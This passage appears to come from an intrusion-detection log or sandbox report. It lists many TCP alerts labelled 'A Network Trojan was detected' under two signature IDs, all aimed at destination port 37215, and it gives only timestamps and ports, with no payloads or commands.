                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850182
                  SID:2835222
                  Source Port:41808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.809030
                  SID:2835222
                  Source Port:35130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821863
                  SID:2829579
                  Source Port:33152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.850737
                  SID:2835222
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.225931
                  SID:2829579
                  Source Port:33982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.179057
                  SID:2835222
                  Source Port:53584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2835222
                  Source Port:48962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2835222
                  Source Port:36188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.220716
                  SID:2835222
                  Source Port:43934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:47814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990619
                  SID:2829579
                  Source Port:55090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230940
                  SID:2835222
                  Source Port:51350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998046
                  SID:2835222
                  Source Port:43792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.595539
                  SID:2829579
                  Source Port:44932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.815031
                  SID:2835222
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2829579
                  Source Port:40012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.610357
                  SID:2835222
                  Source Port:35328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.550512
                  SID:2829579
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.768210
                  SID:2835222
                  Source Port:38120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.627051
                  SID:2829579
                  Source Port:44678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.533087
                  SID:2835222
                  Source Port:43756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189899
                  SID:2835222
                  Source Port:52132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229279
                  SID:2829579
                  Source Port:57510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650241
                  SID:2835222
                  Source Port:45834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.839334
                  SID:2829579
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2829579
                  Source Port:47510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2829579
                  Source Port:54620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2835222
                  Source Port:58568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.343465
                  SID:2835222
                  Source Port:43534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2835222
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.591175
                  SID:2829579
                  Source Port:43364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2835222
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
                  SID:2835222
                  Source Port:45410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118547
                  SID:2829579
                  Source Port:41720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.060029
                  SID:2835222
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.148385
                  SID:2829579
                  Source Port:40644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155412
                  SID:2835222
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.193965
                  SID:2835222
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.420052
                  SID:2835222
                  Source Port:41394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.526140
                  SID:2835222
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.890908
                  SID:2829579
                  Source Port:48752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.968756
                  SID:2835222
                  Source Port:51916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.779854
                  SID:2835222
                  Source Port:57786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891282
                  SID:2829579
                  Source Port:48376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.781687
                  SID:2829579
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.945197
                  SID:2835222
                  Source Port:46356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000855
                  SID:2835222
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2835222
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253246
                  SID:2829579
                  Source Port:44490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.098210
                  SID:2835222
                  Source Port:47054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.301453
                  SID:2829579
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.603262
                  SID:2829579
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2829579
                  Source Port:59690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.520394
                  SID:2835222
                  Source Port:44502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.659815
                  SID:2829579
                  Source Port:50966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.325101
                  SID:2829579
                  Source Port:47598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.373846
                  SID:2829579
                  Source Port:41266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2829579
                  Source Port:60198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2835222
                  Source Port:56774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.976557
                  SID:2829579
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.922365
                  SID:2835222
                  Source Port:42974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2835222
                  Source Port:40394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.903280
                  SID:2829579
                  Source Port:59396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.088936
                  SID:2835222
                  Source Port:60514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.063693
                  SID:2835222
                  Source Port:44604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.797705
                  SID:2829579
                  Source Port:51432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2835222
                  Source Port:46682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2829579
                  Source Port:39386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.990859
                  SID:2835222
                  Source Port:57730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881615
                  SID:2835222
                  Source Port:40546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.958790
                  SID:2829579
                  Source Port:54166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146612
                  SID:2829579
                  Source Port:59128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.148356
                  SID:2835222
                  Source Port:34800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968110
                  SID:2835222
                  Source Port:34550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2829579
                  Source Port:38524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.309217
                  SID:2829579
                  Source Port:37592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.425119
                  SID:2835222
                  Source Port:40838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.221406
                  SID:2829579
                  Source Port:54882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.883721
                  SID:2835222
                  Source Port:35828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301370
                  SID:2835222
                  Source Port:35532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.485057
                  SID:2835222
                  Source Port:34228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841865
                  SID:2835222
                  Source Port:45336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556329
                  SID:2835222
                  Source Port:40892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155945
                  SID:2829579
                  Source Port:41464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.462724
                  SID:2829579
                  Source Port:55444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.889582
                  SID:2835222
                  Source Port:51982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.332526
                  SID:2835222
                  Source Port:36248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.836980
                  SID:2835222
                  Source Port:40728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.302131
                  SID:2829579
                  Source Port:57750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.401809
                  SID:2829579
                  Source Port:53014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051851
                  SID:2835222
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2829579
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:52286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.828158
                  SID:2835222
                  Source Port:40180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107350
                  SID:2835222
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.842272
                  SID:2835222
                  Source Port:40976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2835222
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245667
                  SID:2835222
                  Source Port:44258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.154220
                  SID:2835222
                  Source Port:37028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.646782
                  SID:2835222
                  Source Port:48666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.525965
                  SID:2835222
                  Source Port:34814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2829579
                  Source Port:34774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.418870
                  SID:2829579
                  Source Port:58814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.647438
                  SID:2835222
                  Source Port:57438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.035645
                  SID:2829579
                  Source Port:33986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.242428
                  SID:2835222
                  Source Port:59054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569924
                  SID:2829579
                  Source Port:42490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.334471
                  SID:2829579
                  Source Port:46464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.830687
                  SID:2835222
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.274123
                  SID:2835222
                  Source Port:44288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.585781
                  SID:2835222
                  Source Port:56830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881889
                  SID:2829579
                  Source Port:50122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:54624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.131677
                  SID:2829579
                  Source Port:32896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.084652
                  SID:2835222
                  Source Port:34748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2835222
                  Source Port:36044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2835222
                  Source Port:57792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.349677
                  SID:2829579
                  Source Port:40800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903866
                  SID:2835222
                  Source Port:40336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273376
                  SID:2835222
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.990373
                  SID:2835222
                  Source Port:57062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.500020
                  SID:2835222
                  Source Port:42754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667118
                  SID:2835222
                  Source Port:55708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.931527
                  SID:2835222
                  Source Port:55412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:46716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.845095
                  SID:2835222
                  Source Port:36160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.756969
                  SID:2835222
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2829579
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856517
                  SID:2829579
                  Source Port:53986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.889193
                  SID:2829579
                  Source Port:34190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.077860
                  SID:2835222
                  Source Port:59830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.104096
                  SID:2829579
                  Source Port:55216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.931527
                  SID:2835222
                  Source Port:37812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2829579
                  Source Port:45370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351373
                  SID:2829579
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565170
                  SID:2835222
                  Source Port:46520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2835222
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.127957
                  SID:2829579
                  Source Port:37260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449292
                  SID:2835222
                  Source Port:58380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.008672
                  SID:2829579
                  Source Port:47864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135908
                  SID:2835222
                  Source Port:47574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.935220
                  SID:2829579
                  Source Port:37836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2829579
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2829579
                  Source Port:43120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623766
                  SID:2835222
                  Source Port:42120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105153
                  SID:2835222
                  Source Port:60784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2829579
                  Source Port:48892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.556847
                  SID:2835222
                  Source Port:52734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.482995
                  SID:2829579
                  Source Port:56968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2829579
                  Source Port:43300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286969
                  SID:2829579
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422822
                  SID:2829579
                  Source Port:54890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:48336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.722263
                  SID:2835222
                  Source Port:43968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2835222
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.816832
                  SID:2835222
                  Source Port:59124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527827
                  SID:2829579
                  Source Port:49946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:41716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459997
                  SID:2829579
                  Source Port:35760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875137
                  SID:2829579
                  Source Port:51580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200422
                  SID:2835222
                  Source Port:48364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2835222
                  Source Port:59102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771167
                  SID:2829579
                  Source Port:54694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.095655
                  SID:2829579
                  Source Port:53654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.393293
                  SID:2829579
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835498
                  SID:2835222
                  Source Port:47168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.435270
                  SID:2835222
                  Source Port:40370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605487
                  SID:2829579
                  Source Port:51668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588620
                  SID:2829579
                  Source Port:48260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.928888
                  SID:2835222
                  Source Port:59706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2835222
                  Source Port:58400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.923335
                  SID:2829579
                  Source Port:48272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.476380
                  SID:2829579
                  Source Port:55268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.562262
                  SID:2835222
                  Source Port:47870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2835222
                  Source Port:39722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.838490
                  SID:2835222
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2829579
                  Source Port:44574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2829579
                  Source Port:58840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172014
                  SID:2829579
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.948022
                  SID:2835222
                  Source Port:43512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2829579
                  Source Port:56728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.234829
                  SID:2835222
                  Source Port:58746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.325316
                  SID:2835222
                  Source Port:55938
